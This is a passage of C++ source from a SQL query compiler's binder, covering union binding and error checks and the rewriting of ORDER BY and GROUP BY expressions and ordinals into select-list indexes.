inconsistent access/lock modes. // flag "select * from t1 union select * from t2 for <access> mode" // with a warning that t1 and t2 may have inconsistent access/lock modes. checkAccessLockModes(); //Copies the leftlist and rightlist this conditional union to the appropriate list of the //conditional union node pointed to by the previousIF argument. Union * previousIF = getPreviousIF(); if (previousIF && getUnionForIF()) { copyLeftRightListsToPreviousIF(previousIF, bindWA); } synthPropForBindChecks(); // QSTUFF bindWA->getCurrentScope()->context()->inUnion() = FALSE; // // Check that there are an equal number of select items on both sides. // const RETDesc &leftTable = *child(0)->getRETDesc(); const RETDesc &rightTable = *child(1)->getRETDesc(); RETDesc *resultTable = NULL; RelRoot * root = bindWA->getTopRoot() ; if (root) { if (getGroupAttr()->isStream() && root->hasOrderBy()){ NAString fmtdList1(bindWA->wHeap()); LIST(TableNameMap*) xtnmList1(bindWA->wHeap()); NAString fmtdList2(bindWA->wHeap()); LIST(TableNameMap*) xtnmList2(bindWA->wHeap()); leftTable.getTableList(xtnmList1, &fmtdList1); rightTable.getTableList(xtnmList2, &fmtdList2); *CmpCommon::diags() << DgSqlCode(-4166) << DgString0(fmtdList1) << DgString1(fmtdList2) ; bindWA->setErrStatus(); return this; } } if (leftTable.getDegree() != rightTable.getDegree()) { #ifndef NDEBUG dumpChildrensRETDescs(leftTable, rightTable); #endif if ( (!getUnionForIF()) && (!getCondUnary()) //for triggers ) { // 4126 The row-value-ctors of a VALUES must be of equal degree. // 4066 The operands of a union must be of equal degree. // This is not necessary if we are in an assignment stmt. Lng32 sqlcode = bindWA->getCurrentScope()->context()->inTupleList() ? -4126 : -4066; *CmpCommon::diags() << DgSqlCode(sqlcode); bindWA->setErrStatus(); return this; } } // // For each select item on both sides, create a ValueIdUnion and insert its // ValueId into the select list for the union. 
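  // For example (illustrative): for
  //    SELECT A, B FROM T1 UNION SELECT C, D FROM T2
  // column 1 of the result is ValueIdUnion(A, C) and column 2 is
  // ValueIdUnion(B, D); the result columns keep the left child's column names.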
// // We check to see if there were assignments on either side if ( !getUnionForIF() ) { resultTable = new (bindWA->wHeap()) RETDesc(bindWA); for (CollIndex i = 0; i < leftTable.getDegree(); i++) { ValueIdUnion *vidUnion = new (bindWA->wHeap()) ValueIdUnion(leftTable.getValueId(i), rightTable.getValueId(i), NULL_VALUE_ID, #pragma nowarn(1506) // warning elimination getUnionFlags()); #pragma warn(1506) // warning elimination vidUnion->setIsTrueUnion(TRUE); vidUnion->bindNode(bindWA); if (bindWA->errStatus()) { delete vidUnion; delete resultTable; return this; } ValueId valId = vidUnion->getValueId(); addValueIdUnion(valId, bindWA->wHeap()); resultTable->addColumn(bindWA, leftTable.getColRefNameObj(i), valId); } } else { // Case in which we have asignment statements below this node. // We have to carefuly match the valueids in the IF and ELSE part. // For instance, if SET :a = ... occurs in both branches or only in one. if (getUnionForIF() && assignArea) { resultTable = createReturnTable(assignArea, bindWA); } } setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); // // Bind the base class. // // We are done binding this node. The current IF node is now the closest // IF node that is also an ancestor of this node if (getUnionForIF() && assignArea) { assignArea->setCurrentIF(getPreviousIF()); } // QSTUFF // this is not a hard restriction. Once the get_next protocol supports unions // similar to the split-top operator, this check can be removed. if (getGroupAttr()->isEmbeddedUpdateOrDelete() || (getGroupAttr()->isEmbeddedInsert() && !isSystemGenerated_) || (bindWA->isEmbeddedIUDStatement())) { if (getUnionForIF()) { *CmpCommon::diags() << DgSqlCode(-4210); bindWA->setErrStatus(); return this; } NAString fmtdList1(bindWA->wHeap()); LIST(TableNameMap*) xtnmList1(bindWA->wHeap()); NAString fmtdList2(bindWA->wHeap()); LIST(TableNameMap*) xtnmList2(bindWA->wHeap()); leftTable.getTableList(xtnmList1, &fmtdList1); rightTable.getTableList(xtnmList2, &fmtdList2); // Fix for Solution 10-070117-1834. // Error Message for -4161 - assumes that both sides // of the UNION is an embedded operation. For a // query such as, // select * from (delete from t709t1)as x union all (select * from t709t1) // the right side of the UNION is not an embedded operation. // Hence, changing the text for 4161 to a more generic one so // that all cases are covered in this one text message. *CmpCommon::diags() << DgSqlCode(-4161) << DgString0(fmtdList1) << DgString1(fmtdList2); bindWA->setErrStatus(); return this; } // QSTUFF // ++MV // Bind the alternateRightChildOrderExprTree expression. // ItemExpr *alternateRightChildOrderExprTree = removeAlternateRightChildOrderExprTree(); if (alternateRightChildOrderExprTree) { alternateRightChildOrderExprTree-> convertToValueIdList(alternateRightChildOrderExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { return NULL; } } // --MV // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) { delete resultTable; return boundExpr; } return boundExpr; } // Union::bindNode() // check for & warn against UNIONs that have inconsistent access/lock modes void Union::checkAccessLockModes() { Scan *left = child(0)->getAnyScanNode(); Scan *right = child(1)->getAnyScanNode(); if (!left || !right) return; // no-op. 
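  // For example (illustrative): if only one branch carries an explicit access
  // clause, as in
  //    SELECT * FROM T1 UNION SELECT * FROM T2 FOR BROWSE ACCESS;
  // one scan uses the user-specified DP2 lock flags while the other falls back
  // to the session's transaction-mode flags, and warning 3192 names both
  // tables when the two settings differ.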
// UNION is user-specified as opposed to system-generated (eg, by // triggers/RI in GenericUpdate::inlinePipelineActions, etc) if (isSystemGenerated_) { return; } Lng32 lockFlagSession = CmpCommon::transMode()->getDP2LockFlags().getValue(); StmtLevelAccessOptions optionsLeft = left->accessOptions(); StmtLevelAccessOptions optionsRight = right->accessOptions(); Lng32 lockFlagLeft = lockFlagSession; Lng32 lockFlagRight = lockFlagSession; if (optionsLeft.userSpecified()) { lockFlagLeft = optionsLeft.getDP2LockFlags().getValue(); } if (optionsRight.userSpecified()) { lockFlagRight = optionsRight.getDP2LockFlags().getValue(); } if (lockFlagLeft != lockFlagRight) { *CmpCommon::diags() << DgSqlCode(3192) << DgString0(left->getTableName().getQualifiedNameAsString()) << DgString1(right->getTableName().getQualifiedNameAsString()); } } // Union::checkAccessLockModes() void Union::copyLeftRightListsToPreviousIF(Union * previousIF, BindWA * bindWA) { AssignmentStHostVars *thisLeftList = leftList(); AssignmentStHostVars *thisRightList = rightList(); // If the previous IF node does not have a left list, we copy the left and right // lists to that left list if (previousIF->currentChild() == 0 && !(previousIF->leftList())) { AssignmentStHostVars *leftListOfPreviousIF = previousIF->getCurrentList(bindWA); // Copy the leftList of this node to the left list of the previous IF leftListOfPreviousIF->addAllToListInIF(thisLeftList) ; // Copy the rightList of this node to the left list of the previous IF leftListOfPreviousIF->addAllToListInIF(thisRightList) ; } // If the previous IF node does not have a right list, we copy the left and right // lists to that left list if (previousIF->currentChild() == 1 && !(previousIF->rightList())) { AssignmentStHostVars *rightListOfPreviousIF = previousIF->getCurrentList(bindWA); // Copy the leftList of this node to the right list of the previous IF rightListOfPreviousIF->addAllToListInIF(thisLeftList) ; // Copy the rightList of this node to the right list of the previous IF rightListOfPreviousIF->addAllToListInIF(thisRightList) ; } } // Union::copyLeftRightListsToPreviousIF // ----------------------------------------------------------------------- // MV -- // A debugging method for dumping the columns in the RETDesc of both // children when they do not match. void Union::dumpChildrensRETDescs(const RETDesc& leftTable, const RETDesc& rightTable) { #ifndef NDEBUG // -- MVs. Debugging code !!!!! 
TBD fprintf(stdout, " # Left Right\n"); CollIndex maxIndex, minIndex; NABoolean leftIsBigger; if (leftTable.getDegree() > rightTable.getDegree()) { maxIndex = leftTable.getDegree(); minIndex = rightTable.getDegree(); leftIsBigger = TRUE; } else { maxIndex = rightTable.getDegree(); minIndex = leftTable.getDegree(); leftIsBigger = FALSE; } for (CollIndex i=0; i<minIndex; i++) { ColumnDesc *leftColDesc = leftTable.getColumnList()->at(i); ColumnDesc *rightColDesc = rightTable.getColumnList()->at(i); NAString leftCol (leftColDesc->getColRefNameObj().getColRefAsString()); NAString rightCol(rightColDesc->getColRefNameObj().getColRefAsString()); fprintf(stdout, " %3d %-55s %-55s \n", i, leftCol.data(), rightCol.data()); } if (leftIsBigger) { for (CollIndex j=minIndex; j<maxIndex; j++) { ColumnDesc *leftColDesc = leftTable.getColumnList()->at(j); NAString leftCol(leftColDesc->getColRefNameObj().getColRefAsString()); fprintf(stdout, " %3d %-35s\n", j, leftCol.data()); } } else { for (CollIndex k=minIndex; k<maxIndex; k++) { ColumnDesc *rightColDesc = rightTable.getColumnList()->at(k); NAString rightCol(rightColDesc->getColRefNameObj().getColRefAsString()); fprintf(stdout, " %3d %-35s \n", k, rightCol.data()); } } #endif } // ---------------------------------------------------------------------- // static helper functions for classes RelRoot and GroupByAgg // ---------------------------------------------------------------------- static NABoolean containsGenericUpdate(const RelExpr *re) { if (re->getOperator().match(REL_ANY_GEN_UPDATE)) return TRUE; for (Int32 i = 0; i < re->getArity(); ++i ) { if (re->child(i) && containsGenericUpdate(re->child(i))) return TRUE; } return FALSE; } static NABoolean containsUpdateOrDelete(const RelExpr *re) { if (re->getOperator().match(REL_ANY_UPDATE_DELETE)) return TRUE; for (Int32 i = 0; i < re->getArity(); ++i ) { if (re->child(i) && containsUpdateOrDelete(re->child(i))) return TRUE; } return FALSE; } // QSTUFF static GenericUpdate *getGenericUpdate(RelExpr *re) { if (re) { if (re->getOperatorType() == REL_UNARY_UPDATE || re->getOperatorType() == REL_UNARY_DELETE) return (GenericUpdate *)re; for (Int32 i = 0; i < re->getArity(); ++i) { // check all children (both sides) GenericUpdate *gu = getGenericUpdate(re->child(i)); if (gu) return gu; } } return NULL; } static NABoolean checkUnresolvedAggregates(BindWA *bindWA) { const ValueIdSet &aggs = bindWA->getCurrentScope()->getUnresolvedAggregates(); if (aggs.isEmpty()) return FALSE; // no error NAString unparsed(bindWA->wHeap()); for (ValueId vid = aggs.init(); aggs.next(vid); aggs.advance(vid)) { const ItemExpr *ie = vid.getItemExpr(); CMPASSERT(ie->isAnAggregate()); Aggregate *agg = (Aggregate *)ie; // Don't display COUNT() part of SUM()/COUNTxxx(), our implementation of AVG() // Display only the COUNT_NONULL() our implementation of VARIANCE and STDDEV // This is to avoid printing the aggregate functions more than once. if((agg->origOpType() != ITM_AVG || agg->getOperatorType() == ITM_SUM) && (!(agg->origOpType() == ITM_STDDEV || agg->origOpType() == ITM_VARIANCE) || agg->getOperatorType() == ITM_COUNT_NONULL)){ unparsed += ", "; if (agg->origOpType() == ITM_COUNT_STAR__ORIGINALLY) unparsed += "COUNT(*)"; else agg->unparse(unparsed, DEFAULT_PHASE, USER_FORMAT_DELUXE); } } unparsed.remove(0,2); // remove initial ", " // 4015 Aggregate functions placed incorrectly. 
*CmpCommon::diags() << DgSqlCode(-4015) << DgString0(unparsed); bindWA->setErrStatus(); return TRUE; } // checkUnresolvedAggregates() // ---------------------------------------------------------------------- // member functions for class RelRoot // ---------------------------------------------------------------------- static NABoolean isRenamedColInSelList(BindWA * bindWA, ItemExpr * col, ItemExprList &origSelectList, CollIndex &indx, RETDesc * childRETDesc) { if (col->getOperatorType() != ITM_REFERENCE) return FALSE; ColReference * havingColReference = (ColReference*)col; CollIndex j = 0; NABoolean found = FALSE; while (j < origSelectList.entries()) { ItemExpr * selectListEntry = origSelectList[j]; if (selectListEntry->getOperatorType() == ITM_RENAME_COL) { const ColRefName &selectListColRefName = *((RenameCol *)selectListEntry)->getNewColRefName(); if (havingColReference->getColRefNameObj() == selectListColRefName) { if (found) { // multiple entries with the same name. Error. *CmpCommon::diags() << DgSqlCode(-4195) << DgString0(selectListColRefName.getColName()); bindWA->setErrStatus(); return FALSE; } ColumnNameMap *baseColExpr = NULL; if (childRETDesc) baseColExpr = childRETDesc->findColumn(selectListColRefName); if ( NOT baseColExpr) { found = TRUE; indx = j; } } } // rename col j++; } // while return found; } static short replaceRenamedColInHavingWithSelIndex( BindWA * bindWA, ItemExpr * expr, ItemExprList &origSelectList, NABoolean &replaced, NABoolean &notAllowedWithSelIndexInHaving, RETDesc * childRETDesc) { if (((expr->getOperatorType() >= ITM_ROW_SUBQUERY) && (expr->getOperatorType() <= ITM_GREATER_EQ_ANY)) || ((expr->getOperatorType() >= ITM_AVG) && (expr->getOperatorType() <= ITM_VARIANCE)) || ((expr->getOperatorType() >= ITM_DIFF1) && (expr->getOperatorType() <= ITM_NOT_THIS))) { notAllowedWithSelIndexInHaving = TRUE; return 0; } for (Int32 i = 0; i < expr->getArity(); i++) { CollIndex j = 0; if (isRenamedColInSelList(bindWA, expr->child(i), origSelectList, j, childRETDesc)) { SelIndex * selIndex = new(bindWA->wHeap()) SelIndex(j+1); expr->setChild(i, selIndex); replaced = TRUE; } else if (bindWA->errStatus()) return -1; else if (replaceRenamedColInHavingWithSelIndex( bindWA, expr->child(i), origSelectList, replaced, notAllowedWithSelIndexInHaving, childRETDesc)) return -1; } return 0; } static short setValueIdForRenamedColsInHaving(BindWA * bindWA, ItemExpr * expr, ValueIdList &compExpr) { if (((expr->getOperatorType() >= ITM_ROW_SUBQUERY) && (expr->getOperatorType() <= ITM_GREATER_EQ_ANY)) || ((expr->getOperatorType() >= ITM_AVG) && (expr->getOperatorType() <= ITM_VARIANCE)) || ((expr->getOperatorType() >= ITM_DIFF1) && (expr->getOperatorType() <= ITM_NOT_THIS))) { return 0; } for (Int32 i = 0; i < expr->getArity(); i++) { if (expr->child(i)->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)expr->child(i)->castToItemExpr(); si->setValueId(compExpr[si->getSelIndex()-1]); } else setValueIdForRenamedColsInHaving(bindWA, expr->child(i), compExpr); } return 0; } // Method to update the selIndecies after we have gone through a // selectList expansion due to MVFs or Subqueries with degree > 1 // used to update the orderByTree // // Returns a list of SelIndecies that were updated. static void fixUpSelectIndecies(ItemExpr * expr, ValueIdSet &updatedIndecies, CollIndex idx, CollIndex offset) { if (expr == NULL ) return; for (Int32 i = 0; i < expr->getArity(); i++) { // Only update ones that we haven't already done. 
if ((expr->child(i)->getOperatorType() == ITM_SEL_INDEX) && !updatedIndecies.contains(expr->child(i)->getValueId())) { SelIndex * si = (SelIndex*)expr->child(i)->castToItemExpr(); if (si->getSelIndex() > idx) { si->setSelIndex(si->getSelIndex() + offset); updatedIndecies += si->getValueId(); } } else fixUpSelectIndecies(expr->child(i), updatedIndecies, idx, offset); } // Now check myself.. // Only update ones that we haven't already done. if ((expr->getOperatorType() == ITM_SEL_INDEX) && !updatedIndecies.contains(expr->getValueId())) { SelIndex * si = (SelIndex*)expr->castToItemExpr(); if (si->getSelIndex() > idx) { si->setSelIndex(si->getSelIndex() + offset); updatedIndecies += si->getValueId(); } } } // Method to update the selIndecies after we have gone through a // selectList expansion due to MVFs or Subqueries with degree > 1 // used to update the GroupByList // // Returns a list of SelIndecies that were updated. static void fixUpSelectIndeciesInSet(ValueIdSet & expr, ValueIdSet &updatedIndecies, CollIndex idx, CollIndex offset) { for (ValueId vid = expr.init(); expr.next(vid); expr.advance(vid)) { // Only update ones that we haven't already done. if (((ItemExpr *)vid.getItemExpr())->getOperatorType() == ITM_SEL_INDEX && !updatedIndecies.contains(vid)) { SelIndex * si = (SelIndex*) vid.getItemExpr(); if (si->getSelIndex() > idx) { si->setSelIndex(si->getSelIndex() + offset); updatedIndecies += si->getValueId(); } } } } RelRoot * RelRoot::transformOrderByWithExpr(BindWA *bindWA) { NABoolean specialMode = (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON); if (NOT specialMode) return this; ItemExprList origSelectList(bindWA->wHeap()); ItemExprList origOrderByList(bindWA->wHeap()); CollIndex origSelectListCount ; if ((getCompExprTree() == NULL) && (child(0)->getOperatorType() != REL_GROUPBY)) { return this; } ItemExpr *orderByTree = getOrderByTree(); if (!orderByTree) return this; if (orderByTree) { origOrderByList.insertTree(orderByTree); } if (getCompExprTree()) origSelectList.insertTree(getCompExprTree()); else if (child(0)->getOperatorType() == REL_GROUPBY) { // this is the case: select distinct <expr> from t order by <expr> GroupByAgg * grby = (GroupByAgg *)(child(0)->castToRelExpr()); if (grby->child(0) && grby->child(0)->getOperatorType() == REL_ROOT) { RelRoot * selRoot = (RelRoot*)grby->child(0)->castToRelExpr(); if (selRoot->getCompExprTree()) origSelectList.insertTree(selRoot->getCompExprTree()); } } Lng32 selListCount = origSelectList.entries(); // if there is an expression in the order by list and this expression matches // a select list expression, then replace it with the index of that select list item. 
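  // For example (illustrative), under MODE_SPECIAL_4:
  //    SELECT A + B FROM T ORDER BY A + B;
  // the ORDER BY entry is recognized as a duplicate of select list item 1 and
  // is replaced by SelIndex(1) (wrapped in InverseOrder if DESC was given);
  // if no select list item matches, error 4197 is raised.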
ItemExprList newOrderByList((Lng32)origOrderByList.entries(), bindWA->wHeap()); NABoolean orderByExprFound = FALSE; for (Lng32 i = 0; i < origOrderByList.entries(); i++) { ItemExpr * currOrderByItemExpr = origOrderByList[i]; NABoolean isDesc = FALSE; if (currOrderByItemExpr->getOperatorType() == ITM_INVERSE) { currOrderByItemExpr = currOrderByItemExpr->child(0)->castToItemExpr(); isDesc = TRUE; } if (NOT ((currOrderByItemExpr->getOperatorType() == ITM_SEL_INDEX) || (currOrderByItemExpr->getOperatorType() == ITM_REFERENCE) || (currOrderByItemExpr->getOperatorType() == ITM_CONSTANT))) { NABoolean found = FALSE; Lng32 selListIndex = 0; ItemExpr * selItem = NULL; while ((NOT found) && (selListIndex < selListCount)) { selItem = origSelectList[selListIndex]; found = currOrderByItemExpr->duplicateMatch(*selItem); if (NOT found) selListIndex++; } if (NOT found) { *CmpCommon::diags() << DgSqlCode(-4197) << DgString0("ORDER BY"); bindWA->setErrStatus(); return NULL; } selItem->setInOrderByOrdinal(TRUE); currOrderByItemExpr = new(bindWA->wHeap()) SelIndex(selListIndex+1); if (isDesc) { currOrderByItemExpr = new(bindWA->wHeap()) InverseOrder(currOrderByItemExpr); } orderByExprFound = TRUE; } // if order by expr newOrderByList.insert(currOrderByItemExpr); } if ((orderByExprFound) && (newOrderByList.entries() > 0)) { removeOrderByTree(); addOrderByTree(newOrderByList.convertToItemExpr()); } return this; } /////////////////////////////////////////////////////////////////////////// // // This methods performs the following in this order: // // If groupby name refers to a renamed col name in the select list, // replace group by entry with ordinal position of that sel list entry. // // If groupby ordinal exceeds the number of select list elements, // return error. // // If groupby ordinal referes to a '*', return error. // // If groupby ordinal refers to a column(ITM_REFERENCE) or a renamed // col name(ITM_RENAME_COL) whose child is a column(ITM_REFERENCE), // replace ordinal with actual col name. // // If there are ordinals in group by list, mark RelRoot indicating // phase2 transformation is needed. // // Mark all select list item exprs which are referened as an ordinal to // indicate that groupby check to validate grouping columns is not needed // for the subtree rooted below that select list item. 
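// For example (illustrative):
//   SELECT A AS X, B + 1 FROM T GROUP BY X, 2;
// "X" first becomes ordinal 1 and, because item 1 is just the column A, is
// then replaced by that column; ordinal 2 names the expression B + 1, so it
// is kept as a SelIndex and RelRoot is marked for the phase2 transformation.
//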
// /////////////////////////////////////////////////////////////////////////// RelRoot * RelRoot::transformGroupByWithOrdinalPhase1(BindWA *bindWA) { NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON)); if ((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) == DF_OFF) && (NOT specialMode)) return this; // make sure child of root is a groupby node.or a sequence node // whose child is a group by node // And has groupby clause, if in specialMode if (child(0)->getOperatorType() != REL_GROUPBY && (child(0)->getOperatorType() != REL_SEQUENCE || (child(0)->child(0) && child(0)->child(0)->getOperatorType()!=REL_GROUPBY))) return this; NABoolean compExprTreeIsNull = FALSE; CollIndex origSelectListCount ; if (getCompExprTree() == NULL) { compExprTreeIsNull = TRUE; origSelectListCount = 0; // return this; } GroupByAgg * grby; if (child(0)->getOperatorType() == REL_GROUPBY) { grby = (GroupByAgg *)(child(0)->castToRelExpr()); } else {// sequence node above group by grby = (GroupByAgg *)(child(0)->child(0)->castToRelExpr()); } DCMPASSERT(grby != NULL); if ((NOT specialMode) && (grby->getGroupExprTree() == NULL)) return this; ItemExpr * groupExprTree = grby->getGroupExprTree(); ItemExprList origSelectList(bindWA->wHeap()); ItemExprList origGrbyList(bindWA->wHeap()); if (groupExprTree) { origGrbyList.insertTree(groupExprTree); } if (NOT compExprTreeIsNull) { origSelectList.insertTree(getCompExprTree()); origSelectListCount = origSelectList.entries(); } ItemExprList newGroupByList((Lng32)origGrbyList.entries(), bindWA->wHeap()); NABoolean foundSelIndex = FALSE; NABoolean lookForRenamedCols = TRUE; if ((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_ALL) && (NOT specialMode)) lookForRenamedCols = FALSE; NABoolean lookForExprInGroupByClause = TRUE; if (CmpCommon::getDefault(COMP_BOOL_92) == DF_ON) lookForExprInGroupByClause = FALSE; // See if UDF_SUBQ_IN_AGGS_AND_GBYS is enabled. It is enabled if the // default is ON, or if the default is SYSTEM and ALLOW_UDF is ON. NABoolean udfSubqInAggGrby_Enabled = FALSE; DefaultToken udfSubqTok = CmpCommon::getDefault(UDF_SUBQ_IN_AGGS_AND_GBYS); if ((udfSubqTok == DF_ON) || (udfSubqTok == DF_SYSTEM)) udfSubqInAggGrby_Enabled = TRUE; // This list will store duplicate expression specified in select list and // GroupBy clause. It helps with specifying select Index as well as // mark InGroupByOrdinal flag correctly (Gen Sol:10-100129-7836) NAList<CollIndex> listOfExpressions(CmpCommon::statementHeap()); for (CollIndex i = 0; (i < (CollIndex) origGrbyList.entries());i++) { ItemExpr * currGroupByItemExpr = ((ItemExpr *) origGrbyList[i])->castToItemExpr(); ItemExpr * newGroupByItemExpr = NULL; NABoolean selIndexError = FALSE; Int64 selIndex = -1; if (currGroupByItemExpr->getOperatorType() == ITM_CONSTANT) { ConstValue * cv = (ConstValue*)currGroupByItemExpr; if ((cv->canGetExactNumericValue()) && (cv->getType()->getScale() == 0)) { selIndex = cv->getExactNumericValue(); if ((selIndex >= 0) && (selIndex < MAX_COMSINT32)) { if (selIndex == 0 || selIndex > origSelectListCount) { // remember that this select index is in error. // Look for this constant in the select list. // If it is not found, then this const will be // treated as a select index and an error will // returned. If it is found in the select list, // then it will be treated as a group by expression. 
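                // Illustrative (hypothetical) example: in
                //   select 3, a from t group by 3, a;
                // the constant 3 exceeds the select list degree as an
                // ordinal, but duplicate-matches the select list constant
                // later on, so it is treated as a group by expression
                // rather than raising error 4007.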
selIndexError = TRUE; } else currGroupByItemExpr = new(bindWA->wHeap()) SelIndex((Lng32)selIndex); } } } NABoolean found = FALSE; if ((currGroupByItemExpr->getOperatorType() != ITM_REFERENCE) && (currGroupByItemExpr->getOperatorType() != ITM_SEL_INDEX) && (lookForExprInGroupByClause)) { Int32 selListIndex = -1, lastMatch = -1; CollIndex j = 0; while ((NOT found) && (j < origSelectListCount)) { ItemExpr * selectListEntry = origSelectList[j]; if ((selectListEntry->getOperatorType() != ITM_REFERENCE) && ((selectListEntry->getOperatorType() != ITM_RENAME_COL) || ((selectListEntry->child(0)) && (selectListEntry->child(0)->getOperatorType() != ITM_REFERENCE)))) { ItemExpr * renameColEntry = NULL; if (selectListEntry->getOperatorType() == ITM_RENAME_COL) { renameColEntry = selectListEntry; selectListEntry = selectListEntry->child(0); } found = currGroupByItemExpr->duplicateMatch(*selectListEntry); if (found) { lastMatch = j; if(!listOfExpressions.contains(j)) { selListIndex = j; listOfExpressions.insert(j); selectListEntry->setInGroupByOrdinal(TRUE); if (renameColEntry) renameColEntry->setInGroupByOrdinal(TRUE); } else found = FALSE; } } j++; } // while if(lastMatch != -1) { found = TRUE; if(selListIndex == -1) selListIndex = lastMatch; if (bindWA->inViewDefinition()) currGroupByItemExpr = new(bindWA->wHeap()) SelIndex(selListIndex+1, currGroupByItemExpr); else currGroupByItemExpr = new(bindWA->wHeap()) SelIndex(selListIndex+1); } } // expr in group by clause if ((NOT found) && (selIndexError) && (selIndex > 0)) { // this const was not found in the select list and it was // not a valid select index. // Return an error. *CmpCommon::diags() << DgSqlCode(-4007) << DgInt0((Lng32)selIndex) << DgInt1((Lng32)origSelectList.entries()); bindWA->setErrStatus(); return NULL; } if (compExprTreeIsNull) return this; if (currGroupByItemExpr->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)currGroupByItemExpr; if (si->getSelIndex() > origSelectList.entries()) { *CmpCommon::diags() << DgSqlCode(-4007) << DgInt0((Lng32)si->getSelIndex()) << DgInt1((Lng32)origSelectList.entries()); bindWA->setErrStatus(); return NULL; } ItemExpr * selectListEntry = origSelectList[si->getSelIndex()-1]; if ((selectListEntry->getOperatorType() == ITM_RENAME_COL) && (selectListEntry->child(0)->getOperatorType() == ITM_REFERENCE)) { // make a copy of this entry's child newGroupByItemExpr = selectListEntry->child(0)-> castToItemExpr()->copyTopNode(NULL, bindWA->wHeap()); } else if (selectListEntry->getOperatorType() == ITM_REFERENCE) { if (((ColReference*)selectListEntry)-> getColRefNameObj().isStar()) { *CmpCommon::diags() << DgSqlCode(-4185) ; bindWA->setErrStatus(); return NULL; } // make a copy of this entry newGroupByItemExpr = selectListEntry->copyTopNode(NULL, bindWA->wHeap()); } else { selectListEntry->setInGroupByOrdinal(TRUE); newGroupByItemExpr = currGroupByItemExpr; } foundSelIndex = TRUE; } // group by ordinal else if (currGroupByItemExpr->getOperatorType() == ITM_REFERENCE) { ColReference * groupByColReference = (ColReference*)currGroupByItemExpr; // find out if this ColReference name is a renamed col in the // select list. 
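      // Illustrative (hypothetical) example: in
      //   select a+1 as x from t group by x;
      // the reference x is resolved against the renamed select list entry
      // below and replaced by SelIndex(1).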
if (lookForRenamedCols && groupByColReference->getCorrNameObj().getQualifiedNameObj().getObjectName().length() == 0) { NABoolean renamedColsInSelectList = FALSE; CollIndex j = 0; NABoolean found = FALSE; while (j < origSelectList.entries()) { ItemExpr * selectListEntry = origSelectList[j]; if (selectListEntry->getOperatorType() == ITM_RENAME_COL) { renamedColsInSelectList = TRUE; const ColRefName &selectListColRefName = *((RenameCol *)selectListEntry)->getNewColRefName(); if (groupByColReference->getColRefNameObj().getColName() == selectListColRefName.getColName()) { if (found) { // multiple entries with the same name. Error. *CmpCommon::diags() << DgSqlCode(-4195) << DgString0(selectListColRefName.getColName()); bindWA->setErrStatus(); return NULL; } foundSelIndex = TRUE; selectListEntry->setInGroupByOrdinal(TRUE); newGroupByItemExpr = new(bindWA->wHeap()) SelIndex(j+1); ((SelIndex *) newGroupByItemExpr)-> setRenamedColNameInGrbyClause(TRUE); found = TRUE; } } // rename col j++; } // while if ((NOT renamedColsInSelectList) && (j == origSelectList.entries())) lookForRenamedCols = FALSE; } // lookForRenamedCols if (! newGroupByItemExpr) newGroupByItemExpr = currGroupByItemExpr; } // else foundSelIndex else if ((currGroupByItemExpr->getOperatorType() == ITM_USER_DEF_FUNCTION) && (udfSubqInAggGrby_Enabled)) newGroupByItemExpr = currGroupByItemExpr; else if ((currGroupByItemExpr->getOperatorType() == ITM_ROW_SUBQUERY) && (udfSubqInAggGrby_Enabled)) newGroupByItemExpr = currGroupByItemExpr; else { *CmpCommon::diags() << DgSqlCode(-4197) << DgString0("GROUP BY"); bindWA->setErrStatus(); return NULL; } newGroupByList.insert(newGroupByItemExpr); } // for if ((foundSelIndex) && (newGroupByList.entries() > 0)) { grby->removeGroupExprTree(); grby->addGroupExprTree(newGroupByList.convertToItemExpr()); } if ((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_OFF) || (specialMode)) { grby->setParentRootSelectList(getCompExprTree()); } // if order by and group by are specified, check to see that // all columns specified in the order by clause are also present // in the group by clause. 
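  // Illustrative (hypothetical) example (MODE_SPECIAL_4):
  //   select a+1 from t group by a order by a;
  // every ORDER BY column also appears in the GROUP BY clause, so
  // allOrderByRefsInGby_ below remains TRUE.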
allOrderByRefsInGby_ = FALSE; if ((specialMode) && (getOrderByTree()) && (grby->getGroupExprTree() != NULL)) { ItemExpr *orderByTree = getOrderByTree(); ItemExprList orderByList(orderByTree, bindWA->wHeap()); ItemExprList groupByList(grby->getGroupExprTree(), bindWA->wHeap()); allOrderByRefsInGby_ = TRUE; for (CollIndex ii = 0; ii < orderByList.entries(); ii++) { ItemExpr * colRef = orderByList[ii]; if (colRef->getOperatorType() == ITM_INVERSE) colRef = colRef->child(0)->castToItemExpr(); if (colRef && colRef->getOperatorType() == ITM_REFERENCE) { ColReference * obyColRef = (ColReference*)colRef; NABoolean found = FALSE; for (CollIndex j = 0; j < groupByList.entries(); j++) { ItemExpr * gbyExpr = groupByList[j]; if (gbyExpr->getOperatorType() == ITM_REFERENCE) { ColReference * gbyColRef = (ColReference*)gbyExpr; if (obyColRef->getColRefNameObj().getColName() == gbyColRef->getColRefNameObj().getColName()) { found = TRUE; break; } } // if } // for if (NOT found) { allOrderByRefsInGby_ = FALSE; break; } } // if } // for } // if return this; } RelRoot * RelRoot::transformGroupByWithOrdinalPhase2(BindWA *bindWA) { NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON)); // make sure child of root is a groupby node.or a sequence node // whose child is a group by node if (child(0)->getOperatorType() != REL_GROUPBY && (child(0)->getOperatorType() != REL_SEQUENCE || (child(0)->child(0) && child(0)->child(0)->getOperatorType()!=REL_GROUPBY))) return this; GroupByAgg * grby; RelSequence * seqNode=NULL; if (child(0)->getOperatorType() == REL_GROUPBY ) { grby=(GroupByAgg *)(child(0)->castToRelExpr()); } else {//sequence node above group by grby=(GroupByAgg *)(child(0)->child(0)->castToRelExpr()); seqNode=(RelSequence *)(child(0)->castToRelExpr()); } DCMPASSERT(grby != NULL); ValueIdSet &groupExpr = grby->groupExpr(); // copy of groupExpr used to identify the changed // value 